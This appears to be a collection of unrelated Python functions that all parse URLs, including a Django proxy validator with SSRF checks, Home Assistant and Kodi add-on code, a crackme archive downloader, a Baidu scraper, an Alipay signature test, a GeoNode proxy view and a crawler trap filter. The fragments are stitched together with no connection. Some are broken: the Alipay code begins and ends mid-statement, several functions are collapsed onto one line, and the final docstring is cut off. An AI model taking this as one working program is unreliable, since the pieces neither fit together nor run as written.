    url = request.GET.get('url')
    require(url, "missing url parameter")

    try:
        # URLValidator must be instantiated and then called with the value;
        # URLValidator(url) merely builds a validator and validates nothing.
        URLValidator()(url)
    except ValidationError:
        raise AssertionError("invalid url parameter")

    require('HTTP_REFERER' in request.META, "missing referer")
    referer = urlparse(request.META.get('HTTP_REFERER'))
    toproxy = urlparse(url)
    local = urlparse(settings.SITE_URL)

    require(toproxy.hostname, "url has no hostname")
    require(referer.hostname == local.hostname, "referer is not this site")
    require(toproxy.hostname != "localhost", "localhost may not be proxied")
    require(toproxy.netloc != local.netloc, "this site may not be proxied")

    try:
        resolved = socket.gethostbyname(toproxy.hostname)
    except (socket.error, UnicodeError):
        raise AssertionError("url host cannot be resolved")

    # Reject loopback and every private range, not just 127.* / 192.168.*.
    # NOTE(review): the host is resolved again when the proxy fetches it,
    # so DNS rebinding is not covered by this check.
    address = ipaddress.ip_address(resolved)
    require(not (address.is_loopback or address.is_private),
            "url resolves to a local address")

    return url
def _is_latest(js_option, request):
    """
    Return whether we should serve latest untranspiled code.

    Precedence: a 'latest' marker in the request query or in the Referer's
    query string, then an 'es5' marker in the same places, then a non-auto
    configured option, and finally the user agent check.
    """
    import hass_frontend

    if request is None:
        return js_option == 'latest'

    def requested(flag):
        # The flag counts when it is in the query of this request or in
        # the query string of the referring page.
        if flag in request.query:
            return True
        referer = request.headers.get('Referer')
        return referer and flag in urlparse(request.headers['Referer']).query

    # latest in query
    if requested('latest'):
        return True

    # es5 in query
    if requested('es5'):
        return False

    # non-auto option in config
    if js_option != 'auto':
        return js_option == 'latest'

    useragent = request.headers.get('User-Agent')
    return useragent and hass_frontend.version(useragent)
def network_location(url):
    """Return the netloc part of *url*, parsed with 'http' as default scheme."""
    return urlparse(url, scheme='http').netloc
def _extract_site_name(url): parsed = urlparse(url) domain = '{uri.netloc}'.format(uri=parsed) return domain
def parse_blob_url(url):
    """Split a blob URL into its host and path components.

    :returns: ``(netloc, parts)`` where ``parts`` is a tuple holding the
        first path segment and, if present, the remainder of the path
    """
    from urllib.parse import urlparse

    parsed = urlparse(url)
    # Split only once so the remainder keeps its own slashes.
    segments = parsed.path.lstrip('/').split('/', 1)
    return parsed.netloc, tuple(segments)
def __init__(self):
    """Populate the plugin id/handle and the shared ``_globals`` table.

    Reads the plugin URL and handle from ``argv``, creates the Kodi helper
    objects, resolves the data/config/home/plugin paths, generates the
    device id, copies add-on metadata, detects the platform flags, and
    prepares the Accept-Language value and the multi-user context menu.
    """
    # Python 3 first, Python 2 module name as fallback.
    try:
        from urllib.parse import urlparse
    except ImportError:
        from urlparse import urlparse

    # argv[0] can contain the entire path, so we limit ourselves to the base url
    pid = urlparse(argv[0])
    self.pluginid = '{}://{}/'.format(pid.scheme, pid.netloc)
    # Handle is argv[1] when present, -1 otherwise.
    self.pluginhandle = int(argv[1]) if (1 < len(argv)) and self.pluginid else -1

    self._globals['monitor'] = xbmc.Monitor()
    self._globals['addon'] = xbmcaddon.Addon()
    self._globals['dialog'] = xbmcgui.Dialog()
    # self._globals['dialogprogress'] = xbmcgui.DialogProgress()
    self._globals['hasExtRC'] = xbmc.getCondVisibility('System.HasAddon(script.chromium_remotecontrol)')

    # NOTE(review): self.addon is read here although only
    # self._globals['addon'] was assigned above - presumably attribute
    # access is forwarded to _globals elsewhere in the class; confirm.
    self._globals['DATA_PATH'] = py2_decode(xbmc.translatePath(self.addon.getAddonInfo('profile')))
    self._globals['CONFIG_PATH'] = OSPJoin(self._globals['DATA_PATH'], 'config')
    self._globals['HOME_PATH'] = py2_decode(xbmc.translatePath('special://home'))
    self._globals['PLUGIN_PATH'] = py2_decode(self._globals['addon'].getAddonInfo('path'))

    # With main PATHs configured, we initialise the get/write path attributes
    # and generate/retrieve the device ID
    getConfig.configPath = self._globals['CONFIG_PATH']
    writeConfig.configPath = self._globals['CONFIG_PATH']
    self._globals['deviceID'] = self.genID()

    self._globals['__plugin__'] = self._globals['addon'].getAddonInfo('name')
    self._globals['__authors__'] = self._globals['addon'].getAddonInfo('author')
    self._globals['__credits__'] = ""
    self._globals['__version__'] = self._globals['addon'].getAddonInfo('version')

    # OS Detection
    # The flags are OR-ed in, so 'platform' must already hold a value
    # before this method runs.
    if xbmc.getCondVisibility('system.platform.windows'):
        self._globals['platform'] |= self.OS_WINDOWS
    if xbmc.getCondVisibility('system.platform.linux'):
        self._globals['platform'] |= self.OS_LINUX
    if xbmc.getCondVisibility('system.platform.osx'):
        self._globals['platform'] |= self.OS_OSX
    if xbmc.getCondVisibility('system.platform.android'):
        self._globals['platform'] |= self.OS_ANDROID
    # The LE flag is set when /etc/os-release mentions "libreelec".
    if (xbmcvfs.exists('/etc/os-release')) and ('libreelec' in xbmcvfs.File('/etc/os-release').read()):
        self._globals['platform'] |= self.OS_LE

    # Save the language code for HTTP requests and set the locale for l10n
    loc = getdefaultlocale()[0]
    userAcceptLanguages = 'en-gb{}, en;q=0.5'
    # Without a system locale only the English defaults are sent; with one,
    # it is listed first and en-gb is given q=0.75.
    self._globals['userAcceptLanguages'] = userAcceptLanguages.format('') if not loc else '{}, {}'.format(loc.lower().replace('_', '-'), userAcceptLanguages.format(';q=0.75'))

    # Context menu entries; the label text is cut at the first ellipsis
    # character for the first two entries.
    self._globals['CONTEXTMENU_MULTIUSER'] = [
        (getString(30130, self._globals['addon']).split('…')[0], 'RunPlugin({}?mode=LogIn)'.format(self.pluginid)),
        (getString(30131, self._globals['addon']).split('…')[0], 'RunPlugin({}?mode=removeUser)'.format(self.pluginid)),
        (getString(30132, self._globals['addon']), 'RunPlugin({}?mode=renameUser)'.format(self.pluginid))
    ]
def _file_url_to_local_url(self, url: str) -> str: parsed = urlparse(url) if not parsed.path.startswith("/packages"): raise RuntimeError(f"Got invalid download URL: {url}") prefix = self.root_uri if self.root_uri else "../.." return prefix + parsed.path
import os
import sys
import wget
import zipfile
import subprocess
from urllib.parse import urlparse

# Password used for the downloaded crackme archives.
password = b'crackmes.one'


def main():
    """Download a crackme archive by URL and extract it into the cwd.

    The URL comes from the first command-line argument or, failing that,
    from an interactive prompt. Its last path segment is used as the
    archive token.
    """
    if len(sys.argv) == 2:
        url = sys.argv[1]
    else:
        url = input('enter url : ')

    # A trailing slash would otherwise produce an empty token.
    token = urlparse(url).path.rstrip('/').split('/')[-1]

    # The download target lives in ./zips, which may not exist yet.
    os.makedirs('zips', exist_ok=True)

    print(f'downloading "{token}.zip"... ', end='')
    file_name = wget.download(
        f'https://crackmes.one/static/crackme/{token}.zip',
        out=f'zips/{token}.zip',
        bar=None)
    print('\tdone')

    print('extracting files... ', end='')
    # Context manager closes the archive even if extraction fails.
    with zipfile.ZipFile(file_name) as z_file:
        z_file.setpassword(password)
        z_file.extractall()


if __name__ == '__main__':
    main()
def __init__(self, filename):
    """Initialise the parent with *filename*, defaulting to an http:// URL.

    Surrounding whitespace is stripped; when the result has no URL scheme,
    'http://' is prepended before it is passed on.
    """
    location = filename.strip()
    has_scheme = bool(urlparse(location).scheme)
    super().__init__(location if has_scheme else 'http://' + location)
async def data_extraction_for_web_baidu(client, html):
    """Turn one Baidu search-result element into a result record.

    :param client: passed through to ``get_real_url``
    :param html: element exposing ``select``; the first ``h3.t a`` link
        is the result link
    :returns: dict with ``title``, ``url``, ``time``, ``is_parse``,
        ``timestamp`` and ``netloc``; None when there is no usable link,
        the resolved URL is filtered out, or any error occurs
    """
    with async_timeout.timeout(20):
        try:
            # Take the href of the first link under the "h3.t" heading.
            # First: html.select('h3.t a')[0] is the anchor element, which
            #   carries a data-click attribute, target="_blank" and the
            #   result title as its text.
            # Then: get('href', None) yields a Baidu link-tracking URL of
            #   the form http://www.baidu.com/link?url=w2bV3ST9FFL3f39PGG6V...
            url = html.select('h3.t a')[0].get('href', None)
            # NOTE(review): get_real_url presumably resolves the tracking
            # link to its real destination - confirm against the helper.
            real_url = await get_real_url(client=client, url=url) if url else None
            if real_url:
                netloc = urlparse(str(real_url)).netloc
                # urlparse example:
                # >>> import urlparse
                # >>> url = urlparse.urlparse('http://www.baidu.com/index.php?username=guol')
                # >>> print url
                # ParseResult(scheme='http', netloc='www.baidu.com', path='/index.php', params='', query='username=guol',
                #             fragment='')
                # >>> print url.netloc
                # www.baidu.com
                # Skip results that stay on Baidu or sit on a black-listed host.
                if 'baidu' in str(real_url) or netloc in BLACK_DOMAIN:
                    return None
                # print('--------------------')
                # print(RULES.keys())
                # 1 when a rule is registered for this host, else 0.
                is_parse = 1 if netloc in RULES.keys() else 0
                title = html.select('h3.t a')[0].get_text()
                # time = re.findall(r'\d+-\d+-\d+', source)
                # time = time[0] if time else None
                # Date extraction is disabled, so placeholders are returned.
                timestamp = 0
                time = ""
                # if time:
                #     try:
                #         time_list = [int(i) for i in time.split('-')]
                #         timestamp = arrow.get(time_list[0], time_list[1], time_list[2]).timestamp
                #     except Exception as e:
                #         LOGGER.exception(e)
                #         timestamp = 0
                return {
                    'title': title,
                    'url': str(real_url).replace('index.html', ''),
                    'time': time,
                    'is_parse': is_parse,
                    'timestamp': timestamp,
                    'netloc': netloc
                }
            else:
                return None
        except Exception as e:
            # Best effort: any failure is logged and reported as "no result".
            LOGGER.exception(e)
            return None
def make_button(i, url):
    """Return a button label: the 1-based position and the URL's hostname."""
    position = i + 1
    host = urlparse(url).hostname
    return '%d - %s' % (position, host)
def extract_params(fileName, paramsDict):
    """Return ``[directory, basename, source_basename]``.

    The first two items are the ``os.path.split`` of *fileName*; the last
    is the final path component of ``paramsDict['sourceUrl']``.
    """
    source_path = urlparse(paramsDict['sourceUrl']).path
    directory, base = os.path.split(fileName)
    return [directory, base, os.path.basename(source_path)]
def conform(srcjson, destdir, extras):
    ''' Python wrapper for openaddresses-conform.

        Reads the source definition from the JSON file `srcjson`, overlays
        `extras` on it, then downloads, decompresses, samples and converts
        the data inside a temporary sub-directory of `destdir`. The finished
        CSV, if any, is moved to `<destdir>/out.csv`.

        Return a ConformResult built, in order, from:

          the source's 'processed' value (or None)
          a sample of the data, or None if sampling failed
          the source's 'website' value
          the result of conform_license() for the source's license
          geometry type, or None if sampling failed
          number of addresses converted (0 if conversion failed)
          real path of out.csv, or None if no CSV was produced
          elapsed time as timedelta object
          share-alike flag, attribution flag and attribution name

        Creates and destroys a subdirectory in destdir; the subdirectory is
        removed even when one of the steps raises.
    '''
    start = datetime.now()
    source, _ = splitext(basename(srcjson))
    workdir = mkdtemp(prefix='conform-', dir=destdir)

    # Everything that touches workdir runs under try/finally so the temporary
    # directory is not left behind when a step raises.
    try:
        with open(srcjson, 'r') as src_file:
            data = json.load(src_file)
        data.update(extras)

        #
        # The cached data will be a local path.
        #
        scheme, _, cache_path, _, _, _ = urlparse(extras.get('cache', ''))
        if scheme == 'file':
            copy(cache_path, workdir)

        source_urls = data.get('cache')
        if not isinstance(source_urls, list):
            source_urls = [source_urls]

        task1 = URLDownloadTask(source)
        downloaded_path = task1.download(source_urls, workdir)
        _L.info("Downloaded to %s", downloaded_path)

        task2 = DecompressionTask.from_type_string(data.get('compression'))
        names = elaborate_filenames(data.get('conform', {}).get('file', None))
        decompressed_paths = task2.decompress(downloaded_path, workdir, names)
        _L.info("Decompressed to %d files", len(decompressed_paths))

        # Sampling is best-effort: a failure is logged and the result simply
        # carries no sample and no geometry type.
        task3 = ExcerptDataTask()
        try:
            conform = data.get('conform', {})
            data_sample, geometry_type = task3.excerpt(decompressed_paths, workdir, conform)
            _L.info("Sampled %d records", len(data_sample))
        except Exception:
            _L.warning("Error doing excerpt; skipping", exc_info=True)
            data_sample = None
            geometry_type = None

        # Conversion is best-effort as well.
        task4 = ConvertToCsvTask()
        try:
            csv_path, addr_count = task4.convert(data, decompressed_paths, workdir)
            _L.info("Converted to %s with %d addresses", csv_path, addr_count)
        except Exception:
            _L.warning("Error doing conform; skipping", exc_info=True)
            csv_path, addr_count = None, 0

        # Move the CSV out of workdir before workdir is deleted.
        out_path = None
        if csv_path is not None and exists(csv_path):
            move(csv_path, join(destdir, 'out.csv'))
            out_path = realpath(join(destdir, 'out.csv'))
    finally:
        rmtree(workdir)

    sharealike_flag = conform_sharealike(data.get('license'))
    attr_flag, attr_name = conform_attribution(data.get('license'), data.get('attribution'))

    return ConformResult(data.get('processed', None),
                         data_sample,
                         data.get('website'),
                         conform_license(data.get('license')),
                         geometry_type,
                         addr_count,
                         out_path,
                         datetime.now() - start,
                         sharealike_flag,
                         attr_flag,
                         attr_name)
if signer.verify(digest, decodebytes(signature.encode("utf8"))): return True return False def verify(self, data, signature): if "sign_type" in data: sign_type = data.pop("sign_type") # 排序后的字符串 unsigned_items = self.ordered_data(data) message = "&".join(u"{}={}".format(k, v) for k, v in unsigned_items) return self._verify(message, signature) if __name__ == "__main__": return_url = 'https://openapi.alipay.com/gateway.do?timestamp=2013-01-01 08:08:08&method=alipay.trade.page.pay&app_id=16388&sign_type=RSA2&sign=ERITJKEIJKJHKKKKKKKHJEREEEEEEEEEEE&version=1.0&charset=GBK&biz_content=AlipayTradePageCreateandpayModel' o = urlparse(return_url) query = parse_qs(o.query) processed_query = {} ali_sign = query.pop("sign")[0] # 测试用例 alipay = AliPay( # 沙箱里面的appid值 appid="2021000116669532", #notify_url是异步的url app_notify_url="http://39.103.172.179:8000/alipay/return/", # 我们自己商户的密钥 app_private_key_path="../trade/keys/private_key_2048.txt", # 支付宝的公钥 alipay_public_key_path="../trade/keys/ali_public_key_2048.txt", # 支付宝的公钥,验证支付宝回传消息使用,不是你自己的公钥,
def parse_links(self, html, keyword):
    """Analyse one search-results page for ``keyword`` and store the findings.

    Three things are written through the module-level collection objects
    (they are only used via ``insert_one`` / ``find_one`` here):

    * ``mycol_3`` - every suggestion paragraph (``p.nVcaUb``) whose text
      starts with "best" or ends with "review"/"reviews";
    * ``mycol_2`` - every forum URL collected in the module-level
      ``forum_links`` list that is not stored yet;
    * ``mycol``   - one summary row for the keyword (counts per site category,
      snippet flag, root/page counts, domain-age buckets, up to eleven
      (domain, registration date) pairs and the latest registration date).

    :param html: markup of the results page, parsed with ``html.parser``.
    :param keyword: the search keyword the page belongs to.
    :return: None.

    NOTE(review): the source had lost its indentation; the nesting below is
    reconstructed from the statements themselves - in particular, whether the
    summary section sits after the result loop (as written here) or inside
    its last iteration should be confirmed against the original file.
    """
    links_title = []
    total_count = []
    registration_date_latest = []
    social_count = 0
    q_a_count = 0
    forum_count = 0
    affiliate_count = 0
    other_count = 0
    root_count = 0
    page_count = 0
    below_1 = 0
    below_2 = 0
    more_than = 0
    registration_date = []
    soup = BeautifulSoup(html, "html.parser")
    # Snippet flag: "Yes" only when the ".ifM9O" element contains an
    # <h2 class="bNg8Rb">; any lookup failure counts as "No".
    try:
        snippet = soup.select_one(".ifM9O").find('h2', class_="bNg8Rb")
        if snippet:
            snipper_string = "Yes"
        else:
            snipper_string = "No"
    except Exception:
        snipper_string = "No"
    # Store matching search suggestions; failures are silently ignored.
    for title in soup.find_all("p", class_='nVcaUb'):
        try:
            search_suggestion = title.get_text()
            if search_suggestion.startswith("best") or search_suggestion.endswith("review") or \
                    search_suggestion.endswith("reviews"):
                columns = ["Search Keywords", "Search Suggestion Result"]
                suggestion_result = [keyword, search_suggestion]
                # Create a zip object from two lists
                searchObj = zip(columns, suggestion_result)
                # Create a dictionary from zip object
                seachofWords = dict(searchObj)
                # print(registration_date)
                x = mycol_3.insert_one(seachofWords)
        except Exception:
            pass
    # Collect [title, url] for every result container (div.r); a missing
    # anchor or heading yields an empty string for that part.
    for item in soup.find_all("div", class_='r'):
        rows = item.find('a')
        try:
            title = rows.find('h3').get_text()
        except Exception:
            title = ""
        try:
            url = rows.get('href')
        except Exception:
            url = ""
        links_title.append([title, url])
    for i in range(len(links_title)):
        ext = tldextract.extract(links_title[i][1])
        # Registrable domain of the result, e.g. "example.com".
        url = ext.domain + "." + ext.suffix
        # WHOIS lookup: creation_date is first tried as a sequence (first
        # element), then as a single value; if everything fails an empty date
        # is recorded for the domain.
        try:
            w = whois.whois(url)
            try:
                start_date = w.creation_date[0]
                registration_date.extend([url, datetime.datetime.strptime(str(start_date), '%Y-%m-%d %H:%M:%S').date().strftime("%m/%d/%Y")])
                registration_date_latest.append(datetime.datetime.strptime(str(start_date), '%Y-%m-%d %H:%M:%S').
                                                date())
            except:
                start_date = w.creation_date
                registration_date.extend([url, datetime.datetime.strptime(str(start_date), '%Y-%m-%d %H:%M:%S').date().strftime("%m/%d/%Y")])
                registration_date_latest.append(datetime.datetime.strptime(str(start_date), '%Y-%m-%d %H:%M:%S').
                                                date())
        except:
            creation_date = ''
            registration_date.extend([url, creation_date])
        # Domain-age bucket: under a year, exactly one year, or older.
        # NOTE(review): start_date is not reset when the lookup above fails, so
        # this block then sees the previous iteration's value (or an unbound
        # name on the first iteration, swallowed by the bare except) - confirm
        # this is intended.
        try:
            now = datetime.datetime.now()
            start = datetime.datetime.strptime(str(start_date), '%Y-%m-%d %H:%M:%S').date()
            ends = datetime.datetime.strptime(str(now), '%Y-%m-%d %H:%M:%S.%f').date()
            diff = relativedelta(ends, start)
            if diff.years < 1:
                below_1 += 1
            elif diff.years == 1:
                below_2 += 1
            else:
                more_than += 1
        except:
            pass
        # A result counts as a "page" when its URL has a path other than "/",
        # otherwise as a site root.
        root_page = urlparse(links_title[i][1]).path
        if root_page and root_page != '/':
            page_count += 1
        else:
            root_count += 1
        check_social_share = pd.Series(social_share)
        check_q = pd.Series(qa_site)
        # Categorise the result: social, Q/A, forum, affiliate or other.
        # NOTE(review): `ext.subdomain in check_q` tests the Series index
        # labels, unlike the `.values` tests beside it - confirm.
        if ext.domain in check_social_share.values:
            social_count += 1
        elif ext.domain in check_q.values or ext.subdomain in check_q:
            q_a_count += 1
        else:
            aff_match = [True for match in affiliate if match in links_title[i][0].lower()]
            f_match = [True for match in forum if match in links_title[i][1]]
            if True in f_match or any(regex.match(links_title[i][1]) for regex in regexes_forum):
                forum_count += 1
                # Rebuild the forum host without "www" and without dots inside
                # the remaining sub-domain part.
                subdomain_remove_www = ext.subdomain.replace("www", "")
                if subdomain_remove_www:
                    subdomain_remove_www = subdomain_remove_www.replace(".", "")
                    subdomain = subdomain_remove_www + "."
                else:
                    subdomain = ""
                forum_url = subdomain + ext.domain + "." + ext.suffix
                forum_links.append(forum_url)
            elif True in aff_match:
                affiliate_count += 1
            else:
                other_count += 1
        # On the last result, pad with empty (url, date) pairs up to eleven
        # pairs so the values line up with the fixed column list below.
        if i == len(links_title) - 1:
            max_r = 11 - len(links_title)
            for mr in range(0, max_r):
                value_empty = ""
                url = ""
                registration_date.extend([url, value_empty])
    # Summary row values, in the same order as `columns` further down.
    total_count = [keyword, social_count, q_a_count, forum_count, affiliate_count, other_count, snipper_string,
                   root_count, page_count, below_1, below_2, more_than]
    total_count.extend(registration_date)
    if registration_date_latest:
        latest_date = max(registration_date_latest).strftime("%m/%d/%Y")
        # oldest_date = min(registration_date_latest).strftime("%m/%d/%Y")
    else:
        latest_date = ""
        # oldest_date = ""
    total_count.extend([latest_date])
    # self.analysis_data.append(total_count)
    # De-duplicate the collected forum URLs (order preserved) and store the
    # ones that are not in mycol_2 yet.
    final_url_links = list(dict.fromkeys(forum_links))
    for url_link in final_url_links:
        myquery_link = {"Forum Url": url_link}
        mydoc_link = mycol_2.find_one(myquery_link)
        if mydoc_link is None:
            # print(url_link)
            columns_fourms = ["Forum Url"]
            forum_final_url_links = [url_link]
            # Create a zip object from two lists
            forumbObj = zip(columns_fourms, forum_final_url_links)
            # Create a dictionary from zip object
            forumOfWords = dict(forumbObj)
            # print(registration_date)
            x = mycol_2.insert_one(forumOfWords)
    columns = ["Search Keywords", "Social Sharing Site", "Q/A Site", "Forum", "Affiliate Site", "Other", "Snippet",
               "Root", "Page", "Below 1", "Below 2", "More than", "Site1 Root", "Site1", "Site2 Root", "Site2",
               "Site3 Root", "Site3", "Site4 Root", "Site4", "Site5 Root", "Site5", "Site6 Root", "Site6",
               "Site7 Root", "Site7", "Site8 Root", "Site8", "Site9 Root", "Site9", "Site10 Root", "Site10",
               "Site11 Root", "Site11", "Latest Registration Date"]
    # Create a zip object from two lists
    zipbObj = zip(columns, total_count)
    # Create a dictionary from zip object
    dictOfWords = dict(zipbObj)
    #print(registration_date)
    x = mycol.insert_one(dictOfWords)
def proxy(request, url=None, response_callback=None,
          sec_chk_hosts=True, sec_chk_rules=True, timeout=None,
          allowed_hosts=None, **kwargs):
    """Forward ``request`` to another URL and relay the answer.

    :param request: incoming Django request; its method, body and (when
        ``url`` is not given) its ``url`` GET parameter are used.
    :param url: target URL; takes precedence over ``request.GET['url']``.
        A value starting with "/" is resolved against ``settings.SITEURL``.
    :param response_callback: optional callable; when given (and the remote
        response is truthy) it is called with ``kwargs`` extended by
        ``response``, ``content``, ``status`` and ``content_type`` and its
        result is returned.
    :param sec_chk_hosts: when true and ``settings.DEBUG`` is off, the target
        host must pass ``validate_host`` against the allowed hosts.
    :param sec_chk_rules: placeholder, rule checks are not implemented.
    :param timeout: request timeout; falls back to ``TIMEOUT`` when falsy.
    :param allowed_hosts: passed through to ``get_headers``; ``None`` (the
        default) is treated as an empty list.
    :param kwargs: extra keyword arguments handed to ``response_callback``.
    :return: an ``HttpResponse`` (400 without a URL, 403 for a disallowed
        host, 500 when the client returns no response, otherwise the remote
        status) or whatever ``response_callback`` returns.
    """
    # Avoid a shared mutable default argument.
    if allowed_hosts is None:
        allowed_hosts = []

    # Request default timeout
    if not timeout:
        timeout = TIMEOUT

    # Security rules and settings. Copied into a tuple so the "+=" below can
    # never extend a list object owned by the settings module.
    PROXY_ALLOWED_HOSTS = tuple(getattr(settings, 'PROXY_ALLOWED_HOSTS', ()))

    # Sanity url checks
    if 'url' not in request.GET and not url:
        return HttpResponse("The proxy service requires a URL-encoded URL as a parameter.",
                            status=400,
                            content_type="text/plain"
                            )

    raw_url = url or request.GET['url']
    raw_url = urljoin(
        settings.SITEURL,
        raw_url) if raw_url.startswith("/") else raw_url
    url = urlsplit(raw_url)
    scheme = str(url.scheme)

    # White-Black Listing Hosts
    site_url = urlsplit(settings.SITEURL)
    if sec_chk_hosts and not settings.DEBUG:

        # Attach current SITEURL
        if site_url.hostname not in PROXY_ALLOWED_HOSTS:
            PROXY_ALLOWED_HOSTS += (site_url.hostname, )

        # Attach current hostname. The hostname itself is compared (not a
        # one-element tuple), so it is added at most once.
        if check_ogc_backend(geoserver.BACKEND_PACKAGE):
            from geonode.geoserver.helpers import ogc_server_settings
            if ogc_server_settings and ogc_server_settings.hostname not in PROXY_ALLOWED_HOSTS:
                PROXY_ALLOWED_HOSTS += (ogc_server_settings.hostname, )

        # Check OWS regexp: a GetCapabilities request for a known OGC service
        # and a version between 1.0.0 and 3.0.0 white-lists its own host.
        ows_match = ows_regexp.match(url.query) if url.query else None
        if ows_match:
            ows_tokens = ows_match.groups()
            if (len(ows_tokens) == 4
                    and 'version' == ows_tokens[0]
                    and StrictVersion("1.0.0") <= StrictVersion(ows_tokens[1]) <= StrictVersion("3.0.0")
                    # Exact comparison: the former ``in ('getcapabilities')``
                    # was a substring test against a plain string.
                    and ows_tokens[2].lower() == 'getcapabilities'
                    and ows_tokens[3].upper() in ('OWS', 'WCS', 'WFS', 'WMS', 'WPS', 'CSW')):
                if url.hostname not in PROXY_ALLOWED_HOSTS:
                    PROXY_ALLOWED_HOSTS += (url.hostname, )

        # Check Remote Services base_urls
        from geonode.services.models import Service
        for _s in Service.objects.all():
            _remote_host = urlsplit(_s.base_url).hostname
            PROXY_ALLOWED_HOSTS += (_remote_host, )

        if not validate_host(url.hostname, PROXY_ALLOWED_HOSTS):
            return HttpResponse("DEBUG is set to False but the host of the path provided to the proxy service"
                                " is not in the PROXY_ALLOWED_HOSTS setting.",
                                status=403,
                                content_type="text/plain"
                                )

    # Security checks based on rules; allow only specific requests
    if sec_chk_rules:
        # TODO: Not yet implemented
        pass

    # Collecting headers and cookies
    headers, access_token = get_headers(request, url, raw_url, allowed_hosts=allowed_hosts)

    # Inject access_token if necessary.
    # The earlier ``parsed._replace(path=...)`` call discarded its result and
    # therefore never changed the URL; it has been dropped.
    parsed = urlparse(raw_url)
    if parsed.netloc == site_url.netloc and scheme != site_url.scheme:
        # Requests to this site always use the scheme configured in SITEURL.
        parsed = parsed._replace(scheme=site_url.scheme)

    _url = parsed.geturl()

    # Some clients / JS libraries generate URLs with relative URL paths, e.g.
    # "http://host/path/path/../file.css", which the requests library cannot
    # currently handle (https://github.com/kennethreitz/requests/issues/2982).
    # We parse and normalise such URLs into absolute paths before attempting
    # to proxy the request.
    _url = URL.from_text(_url).normalize().to_text()

    if request.method == "GET" and access_token and 'access_token' not in _url:
        query_separator = '&' if '?' in _url else '?'
        _url = f'{_url}{query_separator}access_token={access_token}'

    _data = request.body.decode('utf-8')

    # Avoid translating local geoserver calls into external ones
    if check_ogc_backend(geoserver.BACKEND_PACKAGE):
        from geonode.geoserver.helpers import ogc_server_settings
        _url = _url.replace(
            f'{settings.SITEURL}geoserver',
            ogc_server_settings.LOCATION.rstrip('/'))
        _data = _data.replace(
            f'{settings.SITEURL}geoserver',
            ogc_server_settings.LOCATION.rstrip('/'))

    response, content = http_client.request(
        _url,
        method=request.method,
        data=_data.encode('utf-8'),
        headers=headers,
        timeout=timeout,
        user=request.user)
    if response is None:
        return HttpResponse(
            content=content,
            reason=content,
            status=500)
    content = response.content or response.reason
    status = response.status_code
    content_type = response.headers.get('Content-Type')

    if status >= 400:
        return HttpResponse(
            content=content,
            reason=content,
            status=status,
            content_type=content_type)

    # decompress GZipped responses if not enabled
    # NOTE(review): this looks at the Content-Type value, not at a
    # Content-Encoding header - confirm which one is intended.
    if content and content_type and content_type == 'gzip':
        buf = io.BytesIO(content)
        with gzip.GzipFile(fileobj=buf) as f:
            content = f.read()
        buf.close()

    # Textual payloads are decoded to str; the first successful decode wins.
    PLAIN_CONTENT_TYPES = [
        'text',
        'plain',
        'html',
        'json',
        'xml',
        'gml'
    ]
    for _ct in PLAIN_CONTENT_TYPES:
        if content_type and _ct in content_type and not isinstance(content, str):
            try:
                content = content.decode()
                break
            except Exception:
                pass

    if response and response_callback:
        kwargs = {} if not kwargs else kwargs
        kwargs.update({
            'response': response,
            'content': content,
            'status': status,
            'content_type': content_type
        })
        return response_callback(**kwargs)

    # If we get a redirect, let's add a useful message.
    if status and status in (301, 302, 303, 307):
        # Read the header the same way Content-Type is read above.
        location = response.headers.get('Location')
        _response = HttpResponse((f"This proxy does not support redirects. The server in '{url}' "
                                  f"asked for a redirect to '{location}'"),
                                 status=status,
                                 content_type=content_type
                                 )
        _response['Location'] = location
        return _response

    def _get_message(text):
        """Extract the text after '<b>Message</b>' from an HTML error body."""
        _s = text
        if isinstance(text, bytes):
            _s = text.decode("utf-8", "replace")
        try:
            found = re.search('<b>Message</b>(.+?)</p>', _s).group(1).strip()
        except Exception:
            found = _s
        return found

    return HttpResponse(
        content=content,
        reason=_get_message(content) if status not in (200, 201) else None,
        status=status,
        content_type=content_type)
def is_valid(self, url):
    """
    Function returns True or False based on whether the url has to be fetched or not. This is a great place to
    filter out crawler traps. Duplicated urls will be taken care of by frontier. You don't need to check for
    duplication in this method

    Side effects: rejected trap URLs are appended to the module-level
    ``traps`` list together with the reason; URLs that pass the trap checks
    are added to ``downloaded_all_urls`` and counted per sub-domain in
    ``self.subcnt`` (a leading "www" label is dropped from the key).

    :param url: absolute URL to check.
    :return: True only for http/https URLs whose host ends with
        ".ics.uci.edu" and whose path does not end in a known binary/asset
        extension.
    """
    parsed = urlparse(url)

    # --- Start of the invalid-URL / trap detection ---
    if parsed.scheme not in {"http", "https"}:
        return False

    if "calendar." in url or "/calendar" in url:
        traps.append(url + '\n\t\tTraps: Calendar included- may create infinite webpages')
        return False

    segments = url.split("/")
    unique_segments = set(segments)
    # URLs containing ".." are exempt from the three structural checks below.
    has_parent_ref = '..' in url
    if len(segments) > 10 and not has_parent_ref:
        traps.append(url + "\n\t\tTraps: Recursive paths detected")
        return False
    elif (len(segments) - len(unique_segments) > 1) and 'http' not in unique_segments and not has_parent_ref:
        traps.append(url + "\n\t\tTraps: Repeat Directories detected")
        return False
    elif len(parsed.query.split("&")) > 2 and not has_parent_ref:
        traps.append(url + "\n\t\tTraps: Too many queries-may be dynamic page\n")
        return False

    # --- Trap checks passed: bookkeeping for the statistics ---
    if '.' in parsed.netloc:
        subdomain = parsed.netloc.split(':')[0]  # strip an explicit port
        if 'www' in subdomain.split('.'):
            subdomain = '.'.join(subdomain.split('.')[1:])
        self.subcnt[subdomain] += 1
    downloaded_all_urls.add(url)

    hostname = parsed.hostname
    if hostname is None:
        # A URL without a host can never be in scope (this case used to
        # surface as a TypeError from the membership test).
        print("TypeError for ", parsed)
        return False

    # The host must END with the domain: a plain substring test would also
    # accept hosts such as "www.ics.uci.edu.evil.com".
    return hostname.endswith(".ics.uci.edu") \
        and not re.match(r".*\.(css|js|bmp|gif|jpe?g|ico"
                         r"|png|tiff?|mid|mp2|mp3|mp4"
                         r"|wav|avi|mov|mpeg|ram|m4v|mkv|ogg|ogv|pdf"
                         r"|ps|eps|tex|ppt|pptx|doc|docx|xls|xlsx|names|data|dat|exe|bz2|tar|msi|bin|7z|psd|dmg|iso|epub|dll|cnf|tgz|sha1"
                         r"|thmx|mso|arff|rtf|jar|csv"
                         r"|rm|smil|wmv|swf|wma|zip|rar|gz|pdf)$", parsed.path.lower())
def create_app(db_file=None):
    """Build the bukuserver application.

    Configuration is read from ``BUKUSERVER_*`` environment variables
    (page size, URL render mode, secret key, favicon / new-tab switches,
    database file, reverse-proxy path); ``db_file`` is only used when
    ``BUKUSERVER_DB_FILE`` is unset or empty. The function then opens the
    database, pushes an application context holding it as ``flask.g.bukudb``,
